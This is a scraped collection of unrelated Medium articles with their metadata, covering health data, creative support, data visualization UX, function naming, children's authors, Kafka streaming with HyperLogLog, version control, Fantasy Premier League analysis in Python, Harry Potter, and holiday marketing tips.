evident that technology companies, users, and healthcare professionals have different stances on the topic of digital health data collection through devices. While technology companies have a favorable outlook as they work to develop new products that can be beneficial, citizens have varying levels of trust that their data is used for straightforward purposes. In the healthcare industry, some propose data collection increases efficiency, accuracy, and scalability, and others say it undermines the abilities of the professionals themselves. Cumulatively, these perspectives suggest that health data collection from devices — when active consent, privacy, and personal choice are ensured — is generally positive for both the public and technology companies.
https://towardsdatascience.com/heres-why-we-need-health-data-collection-139cc2aea3ff
['Asmi Kumar']
2020-12-22 14:18:04.439000+00:00
['Data', 'Health', 'Technology', 'People', 'Education']
What to Do When Your Loved Ones Don’t Support Your Art
What to Do When Your Loved Ones Don’t Support Your Art Don’t try to hire them for a job they don’t want. Photo by Thought Catalog on Unsplash The Pain is Real One of the hardest things about being a writer or any kind of creative is when the people we care about don’t support us. When those who are closest to us snub or poo-poo our creative efforts, it hurts — a lot. I have plenty of people in my life who cheer me on as I pursue my passion for writing. For that, I’m grateful. However, there are some people I expected to be in my corner who aren’t having it. Not even a little bit. This has been a source of hurt for me for three years since I’ve started writing again. I’ve been working through this rejection and making strides in coming to terms with it. Until this week, that is. I got a notification that someone close to me who rarely interacts with my blog’s Facebook page commented. I was so excited. When I opened the notification to read it, it was to point out there was a typo in my post. Wow. Really? You never support anything else I do, but you take the time to point out a typo? Nope. Just nope. At first, I responded with a good-natured reply after fixing my typo. I even used a smiley emoji, though I wasn’t feeling smiley. Upon further reflection, I deleted the comment and my reply. Why? Because I don’t need people embarrassing me on a platform I’ve worked hard to create. It wasn’t about the typo. I make them from time to time. We all do. It was that this person’s only effort to reply to my work was to point out a mistake. The plus side is it spurred me to write this article. So there’s that. How to Respond Maybe you’re in the same boat. Maybe there are people you would love to have support you who just aren’t that into what you’re doing. Maybe you have people who ignore you or point out your typos. Yeah, it stinks. I have some good news and a bit of advice. They aren’t your people when it comes to your creative pursuits. Don’t try to hire them for a job they don’t want. I’ve known this for a while, but today’s public typo comment struck that old nerve. When these things happen, here’s how we can choose to respond. DON’T RESPOND — You aren’t obligated to justify yourself and your art to anyone. Not even those close to you. If others don’t share your enthusiasm, don’t waste time worrying about it like I have in the past (or this week). Keep creating. Know that you are good enough without their support. You can and will succeed without their help. APPROACH THEM — If you feel strongly enough and believe saying something would help (in my case I knew it would not), say something. In a non-defensive way, call or sit the person down and share how important what you are doing is to you. No texting, no emails — voice contact only. Let the person know that his or her lack of support hurts. It could be that those who aren’t supporting you simply don’t realize how you feel. FIND YOUR TRIBE — The best people for supporting creative people are other creative people. Join a local writers’ or artists’ group. Find online groups to connect with other creatives. Even if you have the support of those you care about, other artists will support you in a special way that your loved ones cannot. We are a quirky, caring, supportive bunch. THANK YOUR SUPPORTERS — Remember to thank those who care about what you are doing. My husband is the absolute best. He is endlessly encouraging and loving. I know I am fortunate that the person closest to me in all the world supports me. Not everyone has this kind of support. I thank him and others for believing in me because it’s only right to acknowledge their kindness. Be a Cheerleader The best response to negativity is positivity. Please don’t get me wrong. This is grueling work. Avoiding a claws-out confrontation is not easy when you feel hurt. This is especially true when you are passionate about your work. Let the naysayers do their thing and find someone to encourage instead. If you know how it feels to be overlooked or snubbed by those you care about, make sure you don’t do the same. Acknowledge those who are working hard to create something. Read their writing. Buy their art. Go to their concerts. Share their work with others by social media or word of mouth. I’ve gotten into an online critique group with two other women and it has been wonderful. I met them through an online writers’ group. We have never met but have been critiquing each other’s work and cheering each other on. A couple of years ago, I started a small local writers’ group and meet with them monthly. We are strengthened and encouraged by our time together. As the proverb says, iron sharpens iron. Becoming a member of Medium and giving support through claps, comments, and highlights is a great way to be a cheerleader. In doing so, you are helping other writers make money as well. What could be better? Take heart. Not everyone is going to love what you are doing. Not everyone will understand and acknowledge your passion. Choose wisely in how you respond and above all, don’t stop creating. The world needs your art.
https://medium.com/swlh/what-to-do-when-your-loved-ones-dont-support-your-art-856cdc842f5
['Tracy Gerhardt-Cooper']
2019-06-16 23:11:06.279000+00:00
['Relationships', 'Creativity', 'Life Lessons', 'Writing', 'Self Improvement']
3 UX Design Principles for Better Data Visualization
Three UX Design Principles 1. Just KISS I am sorry it is not what you are thinking ;) KISS means “keep it simple, stupid”. Good user experience doesn’t mean stacking all the beautiful graphics together. It looks amazing, but your attention is dispersed everywhere on the screen, and to be honest, it is tiring. It is also not about creating complicated graphs that show off how scientific and professional they look, that only scare people off. There are some graphs we’d better avoid using based on this principle. For example, only use 3D chart if it is really necessary. Most of the time, the third dimension just doesn’t serve any purpose. Instead, it makes the visuals so heavy and thick to digest. Another example is secondary y-axis, it takes more frictions and efforts to understand which axis the chart is mapped against. Like this chart below, can you easily tell which axis is for the bar chart and which one is for the line chart within 3 seconds? Therefore, keep it minimal and eliminate clutter, these simple tricks can additionally make your dashboard looks cleaner instantly: 1. Use no more than five colours (or 3 main colours) in one dashboard. 2. Un-bold chart captions and titles. Make them concise. 3. Remove chart gridlines and borders. Delivering knowledge is not about showing off how skilled you are, rather it is to highlight common understanding between deliverers and receivers. Just KISS! 2. Form Follows Function Built upon the previous point, it is essential to design the dashboard that actually delivers the message to the receivers, hence it is required to meet the key objectives. That is, to prioritize what are the core functions and insights the dashboard needs to demonstrate. Then choose the forms correspondingly. Emphasize on selecting the most appropriate chart that is aligned with the data type. Bar chart compares the measures of categorical data. Histogram looks very similar to the bar chart because it also consists of bars. However, instead of comparing the categorical data, it breaks down a numeric data into interval groups and shows the frequency of data fall into each group. Line chart indicates trend and development of variables over time, usually represented by one numeric data against a date-type variable. It is commonly used in time series analysis. Pie chart is used to represent the percentage and weight of categorical data. Intuitively depict proportions of a whole. Map shows numeric data that can be grouped by regions. Using gradient colors is a great way to visualize the density difference in various geographical locations. Scatter plot visualizes the correlation between two numeric variables. Common to identify relationships such as linear regression, logistic regression etc. These are the most basic charts. There are more complicated graphs that perform advanced analytics such as heatmap, treemap, box plot etc … That’s another story that is definitely worth diving deeper. However, it is not the main focus of this article. Most importanly, it is to always keep the users in mind and be clear about the objectives. It doesn’t matter how fancy the form is if it doesn’t bring any functions. 3. Take the Advantage of Hierarchy Hierarchy is essential in terms of indicating viewers where to look first. It can be constructed implicitly using size, color, position etc. Size: Large and bold fonts are more likely to stand out whereas small and thin texts are less prioritised. If we are using texts to display statistics, make sure they do pop up from other text forms such as title and caption. This principle goes beyond just text, using different sizes of shape also creates a hierarchical layout. Position: Human visual perception determines that we are more likely to look at the top left corner or the center of the screen. Therefore, the most important information should be located at these areas where viewers distribute most of their attention. Color: Bright colors are more likely to stand out whereas pale colors will be brought to the background. Another general rule is that color that breaks the consistency will be perceived as the important message. Therefore, make use of contrast to make the key information grab your audience’s attention.
https://medium.com/analytics-vidhya/3-ux-design-principles-for-better-data-visualization-70548630ff28
['Destin Gong']
2020-09-16 04:04:43.714000+00:00
['Data', 'Data Analysis', 'UX', 'Design', 'Dashboard']
A Useful Framework for Naming Your Classes, Functions, and Variables
Actions Are the Heart of a Function Actions are the verb part of your function name. They’re the most important part in describing what the function does. - get Accesses data immediately (i.e., shorthand getter of internal data). function getFruitsCount() { return this.fruits.length; } - set Declaratively sets a variable with value A to value B . const fruits = 0 function setFruits(nextFruits) { fruits = nextFruits } setFruits(5) console.log(fruits) // 5 - reset Sets a variable back to its initial value or state. const initialFruits = 5 const fruits = initialFruits setFruits(10) console.log(fruits) // 10 function resetFruits() { fruits = initialFruits } resetFruits() console.log(fruits) // 5 - fetch Requests data, which takes time (e.g., an async request). function fetchPosts(postCount) { return fetch('https://api.dev/posts', {...}) } - remove Removes something from somewhere. For example, if you have a collection of selected filters on a search page, removing one of them from the collection is removeFilter , not deleteFilter (and this is how you’d naturally say it in English as well): function removeFilter(filterName, filters) { return filters.filter(name => name !== filterName) } const selectedFilters = ['price', 'availability', 'size'] removeFilter('price', selectedFilters) - delete Completely erases something from the realm of existence. Imagine you’re a content editor, and there’s that notorious post you wish to get rid of. Once you clicked a shiny delete-post button, the CMS performed a deletePost action, not a removePost one. function deletePost(id) { return database.find({ id }).delete() } - compose Creates new data from existing data. This is mostly applicable to strings, objects, or functions. function composePageUrl(pageName, pageId) { return `${pageName.toLowerCase()}-${pageId}` } - handle Handles an action. Often used when naming a callback method.
https://medium.com/better-programming/a-useful-framework-for-naming-your-classes-functions-and-variables-e7d186e3189f
[]
2020-12-24 15:17:13.007000+00:00
['Python', 'Software Development', 'Programming', 'Software Engineering', 'JavaScript']
The 3 Children’s Authors You Must Read
Children’s literature is one of the most sacred types of writing in the entire medium. Kids are so impressionable and curious. They want to know the answers to the big questions, taking in all of the information available to them like a sponge. It takes a truly special author to tap into their own childlike imagination, remembering what intrigued them so many years ago about the world around them. What makes a high quality book for young ones? Does it teach them about history and people? Does the story have the characters that the reader can relate to, while also not being too harsh about the realities of life? Is the language overblown with large vocabulary that is not yet understandable? At the same time, kids are not stupid. The writer should never talk down to their audience. I wanted to present three children’s authors that I enjoyed growing up that I know others benefited from just as much as me. They write timeless stories that are still enjoyed to this day, and hopefully for many more generations into the future. Enjoy! Mary Pope-Osborne Author of one of the best-selling children’s series of the past 30 years, her Magic Tree House saga has been mixing culture, history, and fun into a magical mix for multiple generations of children. Jack and Annie are the brother-sister duo protagonists of the novels, allowing children of both genders to see themselves in the novels while reading about their various adventures. Pope-Osborne runs the gamut on historical and cultural references, sending the siblings back in time through their neighborhood tree house to an enormous set of locations and events. The American Civil and Revolutionary Wars, the sinking of the Titanic, the 1906 San Francisco earthquake, and the volcanic eruption of Mt.Vesuvius are just a sampling of the iconic time pieces that kids are introduced to in accurate and magical ways. History is something that people of all ages should educate themselves on more, so it is vital to kindle a love and interest in it from an early age. These books mix fantastical elements and fictional characters right into the nonfictional happenings of real life in a way that I’ve rarely seen in youth literature. By blurring the line between what’s real and what isn’t, the author convinces the child to have a lifelong love learning about the fascinating countries, mountains, languages, animals, disasters, and peoples that combine to make up our magical planet! Photo by Vincent Branciforti on Unsplash Andrew Clements Known most for the 1996 best-seller Frindle, detailing a student’s made-up term for a pen, Andrew Clements had a unique ability to get inside the mind of the average 11 year old and put their thoughts and emotions onto the page for his readers. His literature hones in on a single protagonist who usually butts heads with an adult somewhere in the classroom or domestically. Nothing too serious, but the problems all give enough food for thought to munch on for a couple hundred pages. The kid who stars in the work is given respect by being put on equal footing with the adult who is opposing them. By taking the authority figure and putting that person on equal terms with the younger student, Clements makes both characters see eye-to-eye a little better. By the end of the novels, the child protagonist has grown up a little more, and the adult has gained greater appreciation for the creativity and innocence of the immature mind. Although Clements himself is no longer with us, his work will continue to be relatable to elementary and middle school students for decades to come. Themes like imagination, friendship, leadership, and teamwork never go out of style. Lemony Snicket/Daniel Handler Handler published under the pen name Lemony Snicket when releasing his iconic set of novels, A Series of Unfortunate Events during the early 2000’s. The saga of the three orphaned Baudelaire siblings who are constantly on the run from the evil Count Olaf has sold millions of copies throughout its lifetime and been adapted into a film in 2004 and a Netflix series between 2017–2019. What makes this work such a must-read for any late-elementary school to middle-school aged kid is the amount of exposure they will receive to real-life problems, but doing so with a whimsy and sense of humor which is unmatched. The protagonists of the series use their inventiveness, book-smarts, and love of one another to overcome any problem they are faced with, which includes arson, underage marriage, and murder. These are all mature themes that have gotten the books banned from the libraries of certain schools around the United States, but rest assured that all of the topics are covered by Handler in a way that is not disturbing to a child. Tone and wording make the macabre elements more cartoony or comical than would be indicated in an adult novel. It introduces young readers to key literature analysis practices that they will certainly be doing much more often as they age into new curriculums. The books force the reader to debate the motivations and intentions behind every protagonist and antagonist, advancing past the surface level plot trope discussions that normally happen in early novel discussions. They’re a must for children and adults alike. And when you can get both age groups in the same room to talk about a book, that’s when you know it’s special.
https://medium.com/age-of-awareness/the-3-childrens-authors-you-must-read-ff3c7e9b8998
['Shawn Laib']
2020-12-08 05:16:01.012000+00:00
['Education', 'Books', 'Children', 'Creativity', 'Teaching']
Streaming With Probabilistic Data Structures: Why & How
In recent years, streaming libraries seem to have evolved significantly. To name a few, we’ve seen Akka Streams, KafkaStreams, Flink, Spark Streaming and others, becoming increasingly popular. There might be numerous reasons for that. A common motivation for using stream processing in your systems is to avoid heavy computations upon raw data in read-time. Instead, we can move those computations to an earlier stage — around the time when the raw data is produced. This architectural pattern allows us to obtain better response times in time-critical transactions, and have surged in popularity in correlation to the general growth of the data organizations handle. In this story, I will examine a rather complicated scenario that can not be easily solved by the intuitive capabilities that streamlining libraries usually offer. I will demonstrate how probabilistic data structures can help us mitigate a common anti-pattern often encountered in stream processing applications: carrying non-aggregative raw data deep down into a streaming topology for calculations, such as distinct count of elements. Before that, I will briefly review how streaming, in general, helps in maintaining aggregations of data, and why it might be a good idea to adopt it in some use-cases. I will use KafkaStreams for demonstrations along the way, but the concepts explored here can be applied in virtually any streaming library. Examples are written in Scala. Aggregating Upon A Stream Oftentimes, we want to aggregate raw data into some meaningful representation that will serve a business need later on. The simplest example for this, perhaps, is the WordCount program, which is kind of the HelloWorld of many streaming libraries. Here is an implementation of it using KafkaStreams. Basically, what it does is: consume some source Kafka topic as a stream some source Kafka topic as a stream split each value into single words each value into single words group that stream by each word that stream by each word count the occurrences per word the occurrences per word produce the results to another Kafka topic The basic idea behind using aggregations in your systems is planning ahead. If you figure out what you want to know about the raw data at a later stage, you can aggregate it and shape it into a form that represents the answers to those questions — right when you first know about the raw data. That means, it happens before those questions are being asked. In fact, some might never be asked, because practically, we are preparing answers for all possible questions we might need answers for! Stream processing aggregation in a nutshell This approach stands in complete opposition to the more conventional one — querying a database upon request and then crunching the results in order to achieve some desired result. This might work well in small apps maintained by small or medium sized teams, but becomes less practical with big data and boundaries between domains and teams naturally emerge. In that scenario, maintaining aggregations often are the adequate solution to various business requirements. Without stream processing, applications need to query and compute upon state in real time The Problem At Hand: Distinct Hashtag Count Alas, not all aggregations are achieved with the same degree of ease. It is no wonder that WordCount is so common as a beginner’s example — it is very easy to implement and understand. But let’s explore a different scenario. Take a social media ecosystem where we need to keep track of how many unique hashtags each user has mentioned in their posts. At a first glance, the streaming solution for this request seems like a direct continuation of what we’ve seen in WordCount. We could consume posts data, group it by user, and then extract & aggregate the hashtags used, perhaps in some Set , which would allow us to easily obtain our desired metric — distinct count. A pseudo-topology that seemingly answers the requests in an adequate way This is how our KafkaStreams topology might look like: A few things happen here. First, I’ve used type aliases in order to avoid the semantically-meaningless String flooding the code. Furthermore, I’ve extracted the logic of obtaining a Set[Hashtag] from a Post to a private function. Other than that, this is exactly what was just described. One of the things I like about KafkaStreams is how intuitive the API is — I think it is pretty easy to grasp and understand this piece of code, even if you haven’t worked with KafkaStreams before. One thing to remember is that this topology will continuously produce massages upon each change to the aggregation, and might be seen as a stream of updates. If you only need the latest state, you can define the output topic as log-compacted. There’s just one problem with this implementation: we have an unbounded data-structure in our topology, which means our streaming application can become more memory heavy than we might have predicted. Remember we said that aggregations are about transforming raw data in a way that fits our read-time needs? Well, our current implementation seems to have violated that concept. We don’t need that Set[Hashtag] really, we just want to know its size. But how can we maintain that number in a streaming application without keeping the underlying Set available? Can we do better? Probabilistic Data Structures To The Rescue Well, of course we can! This is where probabilistic data structures come in. If you haven’t heard of them, don’t worry, we’re going to explore an example together. We will focus on HyperLogLog (aka HLL), a probabilistic data structure that is aimed at solving the very problem we’re facing: … the count-distinct problem… [which] is the problem of finding the number of distinct elements in a data stream with repeated elements (Wikipedia) While the initial, Set -based solution will always be 100% accurate, HyperLogLog suggests a tradeoff: the allocated memory will be of a fixed size, but it might not be absolutely accurate at all times. By and large, the error rate is correlative to the allocated memory. Moreover, in most cases, the error will be of relatively small severity — that is, the estimated count might be off by just a bit. This is why HyperLogLog is considered a probabilistic data structure. In many use cases, this is a reasonable deal. If you’re working on a scenario in which you cannot have any error at all, then this kind of data structures are probably not suitable for your needs. A Scala Implementation Algebird is a neat Scala library created by the folks at Twitter, which is aimed at providing “abstractions for abstract algebra”. A significant part of that library revolves around approximate data types, and includes a HyperLogLog implementation. We’ll try to adapt our KafkaStreams app to use it, but first, let’s examine how to work with Algebird’s HyperLogLog implementation. The HLL type is the data structure itself. It responds to the #approximateSize method, allowing us to obtain the desired number — set-size, which is also known as cardinality. Similarly to working with the naïve Set , here we will also need to add elements to our data structure. Unlike Set , though, adding elements to an HLL is slightly more complex. The thing is, elements added aren’t kept within the HLL , as they are in a conventional Set . That’s the magic of HyperLogLog! If you’re curious about how it actually works, there are tons of videos or articles about it online. Previously, we relied on Set ‘s direct API for adding entries to the set. Algebird’s support for HyperLogLog relies on a common abstraction to achieve the same goal — combining things. That abstraction is called Monoid . Generally speaking, a Monoid for some type A lets us get an empty A and combine any two A ’s. And so, in order to add an element to an HLL , we need to obtain a HyperLogLogMonoid . This is achieved easily: val hllMonoid: HyperLogLogMonoid = new HyperLogLogMonoid(bits = 8) Note that you decide how many bits to allocate — this allows us to control the error rate. We can then get our empty, zero-state HLL : val init: HLL = hllMonoid.zero And simply add elements to it: val newElementData: Array[Byte] = "foobar".toCharArray.map(_.toByte) val newElement: HLL = hllMonoid.create(newElementData) val updatedHLL: HLL = init + newElement As you can see, we can use the HyperLogLogMonoid#create method in order to create a new HLL by passing an Array[Byte] to it. After that, we can add our new HLL to the existing one and get a new one with an updated state. With this knowledge, we can prepare an aggregation function that will replace the previous one we’ve had. We will group all this goodness together under a helper object, Aggregation : As you can see, we are using HyperLogLogMonoid#sum here, in addition to #create . It allows us to combine several HLL s into one, which suits our needs perfectly: we’ll extract the Hashtag s from each Post , then sum them into a HLL , which we will add to the existing, aggregative HLL . Exactly what we wanted to achieve! Putting It All Together With our aggregation function and initialization value ready, we can now go back to our KafkaStreams topology and use them there: I needed to adapt just two lines from the former implementation — the parameters passed to aggregate (line 22) and the way to obtain the (estimated) cardinality, in the map function (line 24). There’s just one thing left — we need to find a way to obtain a Serde[HLL] . If you are unfamiliar with KafkaStreams, this is Serde ‘s definition according to the official documentation: Every Kafka Streams application must provide SerDes (Serializer/Deserializer) for the data types of record keys and record values (e.g. java.lang.String ) to materialize the data when necessary. Essentially, KafkaStreams might need a certain Serde for various operations. Our code would not compile without it. Since aggregation by nature is a stateful operation (simply because we operate on information which is not bounded at the current message being processed), KafkaStreams needs to know how the information can be serialized and deserialized. Luckily, it is pretty easy to get a Serde[HLL] , like this: And with that we’re pretty much done! We’ve managed to incorporate HyperLogLog into our KafkaStreams topology, and honestly, we could have done that in any other Scala streaming library with the same effort, roughly. The main takeaway is how easy this change was and how elegant and concise the end result is. The full code, which includes tests and a runnable apps, is available here. Beyond HyperLogLog Perhaps by now you’re convinced that probabilistic data structures are really fascinating — and there is more than HyperLogLog! If you’re interested, don’t hesitate checking out other data structures implemented in Algebird:
https://medium.com/riskified-technology/streaming-with-probabilistic-data-structures-why-how-b83b2adcd5d4
['Eliav Lavi']
2020-10-27 10:11:11.572000+00:00
['Streaming', 'Engineering', 'Data Structures', 'Big Data', 'Scala']
Top Five Reasons to Learn Version Control Systems
Have you ever been in a situation when you were continually saving multiple documents with random names and got confused when you looked at them after a month or so? Well, many of us have been there including me and we know how tough that is each time! With the amount of information we’re being exposed to increasing each day, it’s important, not just for the Software Engineers, but also for many of them to retrieve any piece of information from anywhere without arduous efforts. For Software Engineers, it’s all the more crucial to gets hands-on experience using Version Control tools as they’ll be using them in their daily lives. So, without any further adieu, let’s mainly realize the top five reasons why Software Engineers (and obviously, others) should learn Version Control.
https://medium.com/datadriveninvestor/top-five-reasons-to-learn-version-control-89c33e04e9c2
['Abishaik Mohan']
2020-12-27 15:25:45.931000+00:00
['Technology', 'Software Development', 'Innovation', 'Productivity', 'Creativity']
Python for FPL(!) Data Analytics
Python for FPL(!) Data Analytics Using Python and Matplotlib to perform Fantasy Football Data Analysis and Visualisation author’s graph Introduction There are two reasons for this piece: (1) I wanted to teach myself some Data Analysis and Visualisation techniques using Python; and (2) I need to arrest my Fantasy Football team’s slide down several leaderboards. But first, credit to David Allen for the helpful guide on accessing the Fantasy Premier League API, which can be found here. To begin, we need to set-up our notebook to use Pandas and Matplotlib (I’m using Jupyter for this), and connect to the Fantasy Premier League API to access the data needed for the analysis. #Notebook Config import requests import pandas as pd import numpy as np %matplotlib inline import matplotlib.pyplot as plt plt.style.use('ggplot') url = ' r = requests.get(url) json = r.json() #API Set-Upurl = ' https://fantasy.premierleague.com/api/bootstrap-static/' r = requests.get(url)json = r.json() Then, we can set up our Pandas DataFrames (think data tables) which will be queried for valuable insights — hopefully. Each DataFrame (_df) we create relates to a JSON data structure accessible via the FPL API. For a full list of these, run json.keys(). We’re interested in ‘elements’ (player data), ‘element_types’ (positional references), and ‘teams’. elements_df = pd.DataFrame(json['elements']) element_types_df = pd.DataFrame(json['element_types']) teams_df = pd.DataFrame(json['teams']) By default, elements_df contains a number of columns we aren’t interested in right now (for an overview of each DataFrame, see David’s article). I’ve created a new DataFrame — main_df — with columns I might want to use. main_df = elements_df[['web_name','first_name','team','element_type','now_cost','selected_by_percent','transfers_in','transfers_out','form','event_points','total_points','bonus','points_per_game','value_season','minutes','goals_scored','assists','ict_index','clean_sheets','saves']] It’s important to note that elements_df uses keys to reference things such as a player’s position and team. For example, in column ‘element_type’, a value of “1” = goalkeeper, and in column ‘team’ a value of “1” = Arsenal. These are references to the two other DataFrames we created (element_types_df, and teams_df) If we preview element_types_df, we’ll see that each ‘id’ number here corresponds to a position:
https://towardsdatascience.com/python-for-fpl-data-analytics-dadb414ccefd
['Charlie Byatt']
2020-10-16 18:20:34.390000+00:00
['Python', 'Data Analysis', 'Matplotlib', 'Data Visualization', 'Football']
The “business book” version of Harry Potter
What we can learn from Harry Potter Think of how much we learn about love and friendship and perseverance through reading a book like Harry Potter. Let’s use a super relatable example of a narrative structure used well in this book and how it taught us about character motivations and reliability. (And okay, I’m going to say something here that may shock you if for some reason you’re one of the three remaining people on Earth who hasn’t read Harry Potter yet. If that’s you, then stop reading now.) Spoiler alert: Dumbledore dies. Not just dies, but Snape kills him. In cold blood. Right there, on the balcony with his wand. While Harry is watching. Damn. For me, this was one of those moments in literature that really came to define how I looked at life, death, love, and friendship. I read this book super early on in my life, while I was still a sponge for information, and it may have been one of the first characters outside of a Disney movie that I came to love who was then taken away from me. Of course, we get over this, yes. But then we also learn from it. And we learn how much of a badass Harry Potter becomes afterward — we know exactly why Harry needs to avenge his death. We know about his parents and their deaths, and we understand, even if we will never truly relate, to the reasons why he has to ultimately take on all of the horcruxes, destroy them, and eventually go toe-to-to with the evil Voldemort. Part of the beauty of this sequence is that it takes a lifetime to get there. Seven books and over 1 million words in all. Was the payoff worth it? Just look to how much the Harry Potter franchise is worth, and you tell me. Now, let’s try one more thing. I’m going to tell the Harry Potter story in a business book inspired anecdote. Ready? Here we go: Harry Potter as a business book case study: In this local school district, the unthinkable happened: The headmaster was murdered. Not only that, but the murderer remained at large. The remaining faculty and students had all the signs of early onset panic, not to mention questions from parents at home and the unrelenting press inquiries. In the 1,000 years since Hogwarts has been the pre-eminent wizarding institution, it was this murder that might put it all at risk. What could they do? But, as we’ve discussed earlier in this book, sometimes the greatest leaders emerge from the least likely of places. In the end, it wouldn’t be the headmaster-in-training or any other senior faculty who would reclaim the honor and dignity of this venerable institution, but a boy. You see, this boy had a decade’s worth of anger and revenge building up in him about murders like this. His parents had also been murdered, and, particularly early on in his school years, he was called out regularly for “being different.” (He had a peculiar scar above his forehead and a strange connection to snakes.) It turned out that, over the years, this boy, Harry, had established something similar to a paternal relationship with Albus Dumbledore. And Albus had, in turn, been teaching Harry, too. When Dumbledore was murdered, Harry rallied his friends together and committed them to a pact. They met in secret, practicing illegal spells on school property and training for a potential future battle. Eventually, these friendships, and the skills they acquired together, saved the school from the battle of the millennium, thereby saving the school, and most of those inside. This is why it’s important to always encourage the “kids who are just a little bit different.” You never know who will have a chip on their shoulder big enough to save your entire world one day. Something tells me this wouldn’t quite rally the same kind of emotional turbulence inside that would get people dressing up like wizards and taking quizzes about which sorting house they belong inside for decades to come. Maybe the trouble with business books isn’t that they aren’t telling stories. Maybe it’s just that we aren’t telling them the right way.
https://bethanymarz.medium.com/the-business-book-version-of-harry-potter-b36af7d6c29f
['Bethany Crystal']
2019-02-11 13:06:06.376000+00:00
['Business', 'People', 'Stories', 'Books', 'Harry Potter']
10 Holiday Marketing Tips from Larry Kim, Neil Patel and More
It’s time to amp up and adjust our marketing strategies for the holidays! If you want to get ahead of the marketing game and stand out from the crowd, check out these incredible unicorn tips from the top social media marketing experts. We’ve got insights from Mari Smith, Neil Patel, Virginia Nussey, Dennis Yu, Lilach Bullock, Lisa Dougherty, Marsha Collier, Sujan Patel and Kristel Cuenta-Cortez. Among the tips? Leveraging live videos, launching Facebook Messenger chatbots, running social media ads and more — all with the aim of increasing brand visibility, ramping up your holiday sales and boosting ROI. So let’s jump right in — and I’ll start with my own №1 holiday marketing tip! 1. Run Facebook Messenger Ads | Larry Kim, CEO of MobileMonkey Ad prices get crazy competitive around the holidays! Since most of your sales are going to come from customers with pre-existing brand affinity, focus the majority of your social ads budget using remarketing as the targeting option rather than trying out new, unproven audiences at this critical time. People’s inboxes will be full of offers, so try reaching your audience using new higher-engagement marketing channels like Facebook Messenger ads in Facebook and Instagram to ensure your targeted audience actually sees your important marketing messages 2. Go Live on Facebook | Mari Smith, Facebook Marketing Expert Use holiday-themed Facebook Live videos to really engage with your audience this holiday season. Facebook continues to favor content that generates meaningful social interaction, specifically conversations between people within the comments on Page posts. Live video typically leads to discussion among viewers on Facebook, which helps bump up the algorithms and you should see even more reach on your posts. In fact, Facebook states that live videos on average get six times as many interactions as regular videos. Strive to stand out in the news feed and create “thumb-stopping” live video content that draws your audience in. What if you did a whole “bah humbug” Facebook Live centered around how crazy it is that stores seem to start pushing the Holidays earlier and earlier every year? Use the broadcast as a fun way to get your audience talking to you — and with one another — about their preferences around the Holidays. You can then retarget your video viewers with different content driving to your website, offers, etc. Or, perhaps someone in your office would be willing to dress up as Santa Claus and do a whole series of Facebook Live videos where you do prize drawings and giveaways! Or, mobilize some team members to come on live video as “Santa’s elves” and show behind-the-scenes of how your products are created, or your service is developed. Think outside the box and get creative to put a smile on the faces of your prospects and customers and have your business/brand be top of feed and top of mind! 3. Collaborate with Influencers and Create Gift Suggestions | Lilach Bullock, Content Marketing and Social Media Specialist It’s difficult to stand out during the holiday season when everybody is sharing special offers and discounts. But one way to stand out and generate better results during this period, is to collaborate with a relevant social influencer as they can help you reach a wider audience. However, you need to start working on this campaign way ahead of time: from finding the ideal influencers to work with to planning the actual content, it’s a big project but one that can yield amazing results. Another tip I have to mention is to create remarketing campaigns on social media and target all of those people who viewed your products but didn’t buy. Everyone is looking for gifts during this time period so chances are, they’re checking out a lot of ideas and products — remind them of your products at the right time and it can have an amazing effect on your sales. 4. Give Your Social Media Channels a Holiday Makeover | Virginia Nussey, Marketing Director at MobileMonkey Holiday fever is not just for ecommerce. B2B should get hyped for the holidays, too. Holidays are an occasion for a company to reveal its customer appreciation along with its culture, brand and staff appreciation. And doing so can have a positive marketing impact through visibility and brand affinity during the cheery time of year. Give your Facebook chatbot and social media avatars a holiday makeover — and that will mean something different for every brand. Just because B2B marketers don’t have a Black Holiday sale to promote for the holidays (although, you certainly could!), doesn’t mean you shouldn’t have some holiday fun. Your customers (and future customers) may fall a little more in love with you when you take the opportunity to get in the spirit! 5. Curate Sentimental User-Generated Content | Dennis Yu, CEO of BlitzMetrics My №1 tip for the holidays … ask customers and employees what they’re grateful for, collecting the pictures and videos. Then after getting their permission, you now have a massive library of UGC (user-generated content) that you can mix and match to drive sales without having to rely as much on sales and discounts. And now you’ve solved your content issue, too. 6. Run Remarketing Ads | Neil Patel, Founder of Neil Patel Digital During the holiday season, expect your ad costs to increase. Consider pushing out more educational content and sharing them on your social profiles. You can even spend a bit of ad money to promote these educational pieces. From there remarket all of those users and pitch them your product/service through remarketing ads. It’s one of the cheapest ways to acquire customers from the social web at an affordable rate. 7. Show the Human Side of Your Business | Sujan Patel, Co-founder of Mailshake Something I’ve seen that customers and followers of our brand engage with around the holidays is learning more about the team behind the scenes. We are fully remote, and have employees working literally around the world. We’ll work with our employees to share interesting stories about them with our audience to give people the human side of our business. People are in “family” mode, not “business” mode around the holidays. Sharing our company family with them pulls on that thread a bit. 8. Start Early | Marsha Collier, Social Media Author It’s a two-pronged approach. Start by reconnecting with your existing customers very early on without a hard sell. Let them know you’re there to help make their holidays easier. Then during the season, your ads should always go for the hard close — make your offer ads irresistible. 9. Create Holiday-Themed Content | Kristel Cuenta-Cortez, Social Media Strategist There’s so much truth in the statement “If you fail to plan, you plan to fail,” especially when crafting a social media campaign for your brand. One best practice successful brands do to ramp up their campaigns is to put together a holiday-themed content schedule based on their goals. For example, if your goal is to solicit customer reviews and collect user-generated content that you can utilize in the future, you can run a simple photo contest where you ask your customers to submit their entries with a branded hashtag. Pick a relevant prize and decide on the theme, and find the best time to launch it! Monitor your results and adjust your strategy as you go along! This doesn’t only provide social proof, but it also saves valuable time and effort since user-generated content is generally free. 10. Leverage Influencers | Lisa Dougherty, Community Manager at Content Marketing Institute My number one social media marketing tip for B2C marketers is to work with top influencers in your niche. People like to scroll through their newsfeeds looking for gift-giving ideas. I know I do. And, they tend to trust brand recommendations from individuals (even if they don’t know them). But, before you get started, make sure you’ve set a clear goal that aligns with your business objectives. Once you’ve determined your goals, you’ll need to find the right influencers in your industry to work with. Once you do, put those influencers to work as your brand’s little elves creating customized content for your social media channels to help increase visibility, trustworthiness, and generate ROI for your brand. Be a Unicorn in a Sea of Donkeys Get my very best Unicorn marketing & entrepreneurship growth hacks: 2. Sign up for occasional Facebook Messenger Marketing news & tips via Facebook Messenger. About the Author Larry Kim is the CEO of MobileMonkey — provider of the World’s Best Facebook Messenger Marketing Platform. He’s also the founder of WordStream. You can connect with him on Facebook Messenger, Twitter, LinkedIn, Instagram. Do you want a Free Facebook Chatbot builder for your Facebook page? Check out MobileMonkey! 